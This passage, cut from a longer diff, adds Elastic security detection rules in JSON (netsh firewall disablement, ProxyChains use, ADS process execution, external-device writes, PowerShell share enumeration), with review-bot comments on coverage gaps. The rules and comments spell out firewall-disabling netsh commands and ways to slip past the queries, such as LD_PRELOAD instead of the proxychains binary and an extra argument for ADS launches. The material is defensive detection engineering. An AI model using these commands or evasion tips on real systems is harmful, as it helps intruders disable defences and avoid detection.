Check whether the user is an administrator and is legitimately performing troubleshooting.\n- In case of an allowed benign true positive (B-TP), assess adding rules to allow needed traffic and re-enable the firewall.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- Review the privileges assigned to the involved users to ensure that the least privilege principle is being followed.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n process.name : \"netsh.exe\" and\n (\n (process.args : \"disable\" and process.args : \"firewall\" and process.args : \"set\") or\n (process.args : \"advfirewall\" and process.args : \"off\" and process.args : \"state\")\n )\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + }, + { + "package": "system", + "version": "^1.6.4" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "4b438734-3793-4fda-bd42-ceeada0be8f9", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline 
to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Resources: Investigation Guide", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1562", + "name": "Impair Defenses", + "reference": "https://attack.mitre.org/techniques/T1562/", + "subtechnique": [ + { + "id": "T1562.004", + "name": "Disable or Modify System Firewall", + "reference": "https://attack.mitre.org/techniques/T1562/004/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 110 + }, + "id": "4b438734-3793-4fda-bd42-ceeada0be8f9_110", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/4b868f1f-15ff-4ba3-8c11-d5a7a6356d37_3.json b/packages/security_detection_engine/kibana/security_rule/4b868f1f-15ff-4ba3-8c11-d5a7a6356d37_3.json new file mode 100644 index 00000000000..f1266166585 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/4b868f1f-15ff-4ba3-8c11-d5a7a6356d37_3.json 
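Review bot: The rule is titled "Disable Windows Firewall Rules via Netsh", but neither branch of the query covers per-rule tampering: `netsh advfirewall firewall set rule name="X" new enable=no` and `netsh advfirewall firewall delete rule name="X"` contain none of `disable`, `off` or `state`, so an attacker who only neutralises the one rule blocking their listener is not seen. A third branch such as `(process.args : "advfirewall" and process.args : "rule" and (process.args : "enable=no" or process.args : "delete"))` would make the query match its title; otherwise rename the rule to say it detects whole-profile disablement only. The B-TP advice in the note ("re-enable the firewall") likewise assumes the whole-firewall case and would need a line about restoring or re-creating individual rules.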
@@ -0,0 +1,89 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "This rule monitors for the execution of the ProxyChains utility. ProxyChains is a command-line tool that enables the routing of network connections through intermediary proxies, enhancing anonymity and enabling access to restricted resources. Attackers can exploit the ProxyChains utility to hide their true source IP address, evade detection, and perform malicious activities through a chain of proxy servers, potentially masking their identity and intentions.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*", + "endgame-*", + "auditbeat-*", + "logs-auditd_manager.auditd-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "ProxyChains Activity", + "note": "## Triage and analysis\n\n### Investigating ProxyChains Activity\n\nAttackers can leverage `proxychains` to obfuscate their origin and bypass network defenses by routing their malicious traffic through multiple intermediary servers.\n\nThis rule looks for processes spawned through `proxychains` by analyzing `proxychains` process execution.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n> This investigation guide uses [placeholder fields](https://www.elastic.co/guide/en/security/current/osquery-placeholder-fields.html) to dynamically pass alert data into Osquery queries. Placeholder fields were introduced in Elastic Stack version 8.7.0. If you're using Elastic Stack version 8.6.0 or earlier, you'll need to manually adjust this investigation guide's queries to ensure they properly run.\n\n#### Possible investigation steps\n\n- Identify any signs of suspicious network activity or anomalies that may indicate network obfuscation. 
This could include unexpected traffic patterns or unusual network behavior.\n - Investigate listening ports and open sockets to look for potential protocol tunneling, reverse shells, or data exfiltration.\n - !{osquery{\"label\":\"Osquery - Retrieve Listening Ports\",\"query\":\"SELECT pid, address, port, socket, protocol, path FROM listening_ports\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Open Sockets\",\"query\":\"SELECT pid, family, remote_address, remote_port, socket, state FROM process_open_sockets\"}}\n- Identify the user account that performed the action, analyze it, and check whether it should perform this kind of action.\n - !{osquery{\"label\":\"Osquery - Retrieve Information for a Specific User\",\"query\":\"SELECT * FROM users WHERE username = {{user.name}}\"}}\n- Investigate whether the user is currently logged in and active.\n - !{osquery{\"label\":\"Osquery - Investigate the Account Authentication Status\",\"query\":\"SELECT * FROM logged_in_users WHERE user = {{user.name}}\"}}\n- Investigate the script execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence and whether they are located in expected locations.\n - !{osquery{\"label\":\"Osquery - Retrieve Running Processes by User\",\"query\":\"SELECT pid, username, name FROM processes p JOIN users u ON u.uid = p.uid ORDER BY username\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Process Info\",\"query\":\"SELECT name, cmdline, parent, path, uid FROM processes\"}}\n- Investigate other alerts associated with the user/host during the past 48 hours.\n - If scripts or executables were dropped, retrieve the files and determine if they are malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - Check if the domain is newly registered or unexpected.\n - Check the reputation of the domain or IP address.\n - File access, modification, and creation activities.\n\n### Related rules\n\n- Suspicious Utility Launched via ProxyChains - 6ace94ba-f02c-4d55-9f53-87d99b6f9af4\n- Potential Protocol Tunneling via Chisel Client - 3f12325a-4cc6-410b-8d4c-9fbbeb744cfd\n- Potential Protocol Tunneling via Chisel Server - ac8805f6-1e08-406c-962e-3937057fa86f\n- Potential Linux Tunneling and/or Port Forwarding - 6ee947e9-de7e-4281-a55d-09289bdf947e\n- Potential Protocol Tunneling via EarthWorm - 9f1c4ca3-44b5-481d-ba42-32dc215a2769\n\n### False positive analysis\n\n- If this activity is related to new benign software installation activity, consider adding exceptions \u2014 preferably with a combination of user and command line conditions.\n- If this activity is related to a system administrator or developer who uses this utility for benign purposes, consider adding exceptions for specific user accounts or hosts. \n- Try to understand the context of the execution by thinking about the user, machine, or business purpose. 
A small number of endpoints, such as servers with unique software, might appear unusual but satisfy a specific business need.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors, such as reverse shells, reverse proxies, or droppers, that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Leverage the incident response data and logging to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "process where host.os.type == \"linux\" and event.action in (\"exec\", \"exec_event\", \"executed\", \"process_started\") and\nevent.type == \"start\" and process.name == \"proxychains\"\n", + "references": [ + "https://blog.bitsadmin.com/living-off-the-foreign-land-windows-as-offensive-platform" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "auditd_manager", + "version": "^1.0.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "4b868f1f-15ff-4ba3-8c11-d5a7a6356d37", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Command and Control", + "Data Source: Elastic Defend", + "Data Source: Elastic Endgame", + "Data Source: Auditd Manager" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0011", + "name": "Command and Control", + "reference": "https://attack.mitre.org/tactics/TA0011/" + }, + "technique": [ + { + "id": "T1572", + "name": "Protocol Tunneling", + "reference": "https://attack.mitre.org/techniques/T1572/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 3 + }, + "id": "4b868f1f-15ff-4ba3-8c11-d5a7a6356d37_3", + "type": "security-rule" +} \ No newline at end of file 
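Review bot: `process.name == "proxychains"` is an exact match, but the maintained fork proxychains-ng installs its binary as `proxychains4`, and the bare `proxychains` name is only a distribution-provided alias on some systems, so a stock install can run without ever firing; `process.name in ("proxychains", "proxychains4")` keeps the case-sensitive semantics and covers both. Because the tool works by `LD_PRELOAD`-ing `libproxychains4.so`, an operator can export that variable directly and skip the wrapper binary entirely — a limitation worth stating in the description so a silent rule is not read as absence of proxying. The single `references` entry is a Windows-focused post; a link to the proxychains-ng project would ground the binary names the query depends on.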
diff --git a/packages/security_detection_engine/kibana/security_rule/4b868f1f-15ff-4ba3-8c11-d5a7a6356d37_4.json b/packages/security_detection_engine/kibana/security_rule/4b868f1f-15ff-4ba3-8c11-d5a7a6356d37_4.json new file mode 100644 index 00000000000..4bb18b56908 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/4b868f1f-15ff-4ba3-8c11-d5a7a6356d37_4.json 
@@ -0,0 +1,89 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "This rule monitors for the execution of the ProxyChains utility. ProxyChains is a command-line tool that enables the routing of network connections through intermediary proxies, enhancing anonymity and enabling access to restricted resources. Attackers can exploit the ProxyChains utility to hide their true source IP address, evade detection, and perform malicious activities through a chain of proxy servers, potentially masking their identity and intentions.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*", + "endgame-*", + "auditbeat-*", + "logs-auditd_manager.auditd-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "ProxyChains Activity", + "note": "## Triage and analysis\n\n### Investigating ProxyChains Activity\n\nAttackers can leverage `proxychains` to obfuscate their origin and bypass network defenses by routing their malicious traffic through multiple intermediary servers.\n\nThis rule looks for processes spawned through `proxychains` by analyzing `proxychains` process execution.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n> This investigation guide uses [placeholder fields](https://www.elastic.co/guide/en/security/current/osquery-placeholder-fields.html) to dynamically pass alert data into Osquery queries. Placeholder fields were introduced in Elastic Stack version 8.7.0. If you're using Elastic Stack version 8.6.0 or earlier, you'll need to manually adjust this investigation guide's queries to ensure they properly run.\n\n#### Possible investigation steps\n\n- Identify any signs of suspicious network activity or anomalies that may indicate network obfuscation. 
This could include unexpected traffic patterns or unusual network behavior.\n - Investigate listening ports and open sockets to look for potential protocol tunneling, reverse shells, or data exfiltration.\n - !{osquery{\"label\":\"Osquery - Retrieve Listening Ports\",\"query\":\"SELECT pid, address, port, socket, protocol, path FROM listening_ports\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Open Sockets\",\"query\":\"SELECT pid, family, remote_address, remote_port, socket, state FROM process_open_sockets\"}}\n- Identify the user account that performed the action, analyze it, and check whether it should perform this kind of action.\n - !{osquery{\"label\":\"Osquery - Retrieve Information for a Specific User\",\"query\":\"SELECT * FROM users WHERE username = {{user.name}}\"}}\n- Investigate whether the user is currently logged in and active.\n - !{osquery{\"label\":\"Osquery - Investigate the Account Authentication Status\",\"query\":\"SELECT * FROM logged_in_users WHERE user = {{user.name}}\"}}\n- Investigate the script execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence and whether they are located in expected locations.\n - !{osquery{\"label\":\"Osquery - Retrieve Running Processes by User\",\"query\":\"SELECT pid, username, name FROM processes p JOIN users u ON u.uid = p.uid ORDER BY username\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Process Info\",\"query\":\"SELECT name, cmdline, parent, path, uid FROM processes\"}}\n- Investigate other alerts associated with the user/host during the past 48 hours.\n - If scripts or executables were dropped, retrieve the files and determine if they are malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - Check if the domain is newly registered or unexpected.\n - Check the reputation of the domain or IP address.\n - File access, modification, and creation activities.\n\n### Related rules\n\n- Suspicious Utility Launched via ProxyChains - 6ace94ba-f02c-4d55-9f53-87d99b6f9af4\n- Potential Protocol Tunneling via Chisel Client - 3f12325a-4cc6-410b-8d4c-9fbbeb744cfd\n- Potential Protocol Tunneling via Chisel Server - ac8805f6-1e08-406c-962e-3937057fa86f\n- Potential Linux Tunneling and/or Port Forwarding - 6ee947e9-de7e-4281-a55d-09289bdf947e\n- Potential Protocol Tunneling via EarthWorm - 9f1c4ca3-44b5-481d-ba42-32dc215a2769\n\n### False positive analysis\n\n- If this activity is related to new benign software installation activity, consider adding exceptions \u2014 preferably with a combination of user and command line conditions.\n- If this activity is related to a system administrator or developer who uses this utility for benign purposes, consider adding exceptions for specific user accounts or hosts. \n- Try to understand the context of the execution by thinking about the user, machine, or business purpose. 
A small number of endpoints, such as servers with unique software, might appear unusual but satisfy a specific business need.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors, such as reverse shells, reverse proxies, or droppers, that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Leverage the incident response data and logging to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "process where host.os.type == \"linux\" and event.type == \"start\" and event.action in (\"exec\", \"exec_event\", \"executed\", \"process_started\")\n and process.name == \"proxychains\"\n", + "references": [ + "https://blog.bitsadmin.com/living-off-the-foreign-land-windows-as-offensive-platform" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "auditd_manager", + "version": "^1.0.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "4b868f1f-15ff-4ba3-8c11-d5a7a6356d37", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Command and Control", + "Data Source: Elastic Defend", + "Data Source: Elastic Endgame", + "Data Source: Auditd Manager" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0011", + "name": "Command and Control", + "reference": "https://attack.mitre.org/tactics/TA0011/" + }, + "technique": [ + { + "id": "T1572", + "name": "Protocol Tunneling", + "reference": "https://attack.mitre.org/techniques/T1572/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 4 + }, + "id": "4b868f1f-15ff-4ba3-8c11-d5a7a6356d37_4", + "type": "security-rule" +} \ No newline at end of file 
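Review bot: The `query` only fires on `process.name == "proxychains"`, so hosts running proxychains-ng — whose binary is commonly installed as `proxychains4`, with a plain `proxychains` alias depending on distribution packaging — may never trigger this rule; `process.name in ("proxychains", "proxychains4")` is the safer default. The investigation guide's "This rule looks for processes spawned through `proxychains`" overstates what the query does: it sees only the launcher's own exec event, not the child it wraps, which is the job of the related rule 6ace94ba-f02c-4d55-9f53-87d99b6f9af4 already listed. Suggest rewording that sentence to "This rule alerts on execution of the `proxychains` launcher itself; use the related rule to identify the wrapped utility." The sole reference is a Windows-focused post, so a Linux-specific proxychains reference would serve triage better.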
diff --git a/packages/security_detection_engine/kibana/security_rule/4b95ecea-7225-4690-9938-2a2c0bad9c99_3.json b/packages/security_detection_engine/kibana/security_rule/4b95ecea-7225-4690-9938-2a2c0bad9c99_3.json new file mode 100644 index 00000000000..90028a29094 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/4b95ecea-7225-4690-9938-2a2c0bad9c99_3.json 
@@ -0,0 +1,60 @@ +{ + "attributes": { + "anomaly_threshold": 75, + "author": [ + "Elastic" + ], + "description": "A machine learning job has detected a rare process writing data to an external device. Malicious actors often use benign-looking processes to mask their data exfiltration activities. The discovery of such a process that has no legitimate reason to write data to external devices can indicate exfiltration.", + "from": "now-2h", + "interval": "15m", + "license": "Elastic License v2", + "machine_learning_job_id": "ded_rare_process_writing_to_external_device", + "name": "Unusual Process Writing Data to an External Device", + "references": [ + "https://www.elastic.co/guide/en/security/current/prebuilt-ml-jobs.html", + "https://docs.elastic.co/en/integrations/ded", + "https://www.elastic.co/blog/detect-data-exfiltration-activity-with-kibanas-new-integration" + ], + "related_integrations": [ + { + "package": "ded", + "version": "^2.0.0" + }, + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "risk_score": 21, + "rule_id": "4b95ecea-7225-4690-9938-2a2c0bad9c99", + "setup": "## Setup\n\nThe rule requires the Data Exfiltration Detection integration assets to be installed, as well as network and file events collected by integrations such as Elastic Defend and Network Packet Capture (for network events only). \n\n### Data Exfiltration Detection Setup\nThe Data Exfiltration Detection integration detects data exfiltration activity by identifying abnormalities in network and file events. Anomalies are detected using Elastic's Anomaly Detection feature. 
\n\n#### Prerequisite Requirements:\n- Fleet is required for Data Exfiltration Detection.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n- File events collected by the Elastic Defend integration.\n- To install Elastic Defend, refer to the [documentation](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n\n#### The following steps should be executed to install assets associated with the Data Exfiltration Detection integration:\n- Go to the Kibana homepage. Under Management, click Integrations.\n- In the query bar, search for Data Exfiltration Detection and select the integration to see more details about it.\n- Under Settings, click Install Data Exfiltration Detection assets and follow the prompts to install the assets.\n\n#### Anomaly Detection Setup\nBefore you can enable rules for Data Exfiltration Detection, you'll need to enable the corresponding Anomaly Detection jobs. \n- Go to the Kibana homepage. Under Analytics, click Machine Learning.\n- Under Anomaly Detection, click Jobs, and then click \"Create job\". Select the Data View containing your file events. 
For example, this would be `logs-endpoint.events.*` if you used Elastic Defend to collect events.\n- If the selected Data View contains events that match the query in [this](https://github.com/elastic/integrations/blob/main/packages/ded/kibana/ml_module/ded-ml.json) configuration file, you will see a card for Data Exfiltration Detection under \"Use preconfigured jobs\".\n- Keep the default settings and click \"Create jobs\" to start the anomaly detection jobs and datafeeds.\n", + "severity": "low", + "tags": [ + "Use Case: Data Exfiltration Detection", + "Rule Type: ML", + "Rule Type: Machine Learning", + "Tactic: Exfiltration" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0010", + "name": "Exfiltration", + "reference": "https://attack.mitre.org/tactics/TA0010/" + }, + "technique": [ + { + "id": "T1052", + "name": "Exfiltration Over Physical Medium", + "reference": "https://attack.mitre.org/techniques/T1052/" + } + ] + } + ], + "type": "machine_learning", + "version": 3 + }, + "id": "4b95ecea-7225-4690-9938-2a2c0bad9c99_3", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/4bd1c1af-79d4-4d37-9efa-6e0240640242_108.json b/packages/security_detection_engine/kibana/security_rule/4bd1c1af-79d4-4d37-9efa-6e0240640242_108.json new file mode 100644 index 00000000000..bc19b900a3e --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/4bd1c1af-79d4-4d37-9efa-6e0240640242_108.json 
@@ -0,0 +1,93 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies processes running from an Alternate Data Stream. This is uncommon for legitimate processes and sometimes done by adversaries to hide malware.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*", + "winlogbeat-*", + "logs-windows.sysmon_operational-*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Unusual Process Execution Path - Alternate Data Stream", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n process.args : \"?:\\\\*:*\" and process.args_count == 1\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args_count", + "type": "long" + } + ], + "risk_score": 47, + "rule_id": "4bd1c1af-79d4-4d37-9efa-6e0240640242", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + 
"name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1564", + "name": "Hide Artifacts", + "reference": "https://attack.mitre.org/techniques/T1564/", + "subtechnique": [ + { + "id": "T1564.004", + "name": "NTFS File Attributes", + "reference": "https://attack.mitre.org/techniques/T1564/004/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 108 + }, + "id": "4bd1c1af-79d4-4d37-9efa-6e0240640242_108", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/4bd1c1af-79d4-4d37-9efa-6e0240640242_109.json b/packages/security_detection_engine/kibana/security_rule/4bd1c1af-79d4-4d37-9efa-6e0240640242_109.json new file mode 100644 index 00000000000..d7bb0561056 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/4bd1c1af-79d4-4d37-9efa-6e0240640242_109.json 
@@ -0,0 +1,93 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies processes running from an Alternate Data Stream. This is uncommon for legitimate processes and sometimes done by adversaries to hide malware.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.process-*", + "winlogbeat-*", + "logs-windows.sysmon_operational-*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Unusual Process Execution Path - Alternate Data Stream", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n process.args : \"?:\\\\*:*\" and process.args_count == 1\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args_count", + "type": "long" + } + ], + "risk_score": 47, + "rule_id": "4bd1c1af-79d4-4d37-9efa-6e0240640242", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", 
+ "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1564", + "name": "Hide Artifacts", + "reference": "https://attack.mitre.org/techniques/T1564/", + "subtechnique": [ + { + "id": "T1564.004", + "name": "NTFS File Attributes", + "reference": "https://attack.mitre.org/techniques/T1564/004/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 109 + }, + "id": "4bd1c1af-79d4-4d37-9efa-6e0240640242_109", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/4c59cff1-b78a-41b8-a9f1-4231984d1fb6_9.json b/packages/security_detection_engine/kibana/security_rule/4c59cff1-b78a-41b8-a9f1-4231984d1fb6_9.json new file mode 100644 index 00000000000..92f0b4b6838 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/4c59cff1-b78a-41b8-a9f1-4231984d1fb6_9.json 
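Review bot: The `process.args_count == 1` guard in `query` makes the rule trivially evadable: a process started from an ADS with any argument appended (`C:\dir\file.txt:evil.exe -x`) has two args and never matches, while the count appears intended only to guarantee that the single argument is the image path itself. If Elastic Defend and Sysmon record the `:stream` suffix in the image path, `process.executable : "?:\\*:*"` expresses that intent without the count guard; whether they do is not visible here and should be confirmed against test events before changing it. This version differs from `_108` only in the `index` pattern, so the same weakness applies to both.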
@@ -0,0 +1,129 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Detects scripts that contain PowerShell functions, structures, or Windows API functions related to windows share enumeration activities. Attackers, mainly ransomware groups, commonly identify and inspect network shares, looking for critical information for encryption and/or exfiltration.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-windows.powershell*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "PowerShell Share Enumeration Script", + "note": "## Triage and analysis\n\n### Investigating PowerShell Share Enumeration Script\n\nPowerShell is one of the main tools system administrators use for automation, report routines, and other tasks. This makes it available for use in various environments, and creates an attractive way for attackers to execute code.\n\nAttackers can use PowerShell to enumerate shares to search for sensitive data like documents, scripts, and other kinds of valuable data for encryption, exfiltration, and lateral movement.\n\n#### Possible investigation steps\n\n- Examine the script content that triggered the detection; look for suspicious DLL imports, collection or exfiltration capabilities, suspicious functions, encoded or compressed data, and other potentially malicious characteristics.\n- Investigate the script execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Contact the account owner and confirm whether they are aware of this activity.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Evaluate whether the user needs to use PowerShell to complete tasks.\n- Check for additional PowerShell and command line logs that indicate that imported functions were run.\n - Evaluate which information was potentially mapped and accessed by the attacker.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. 
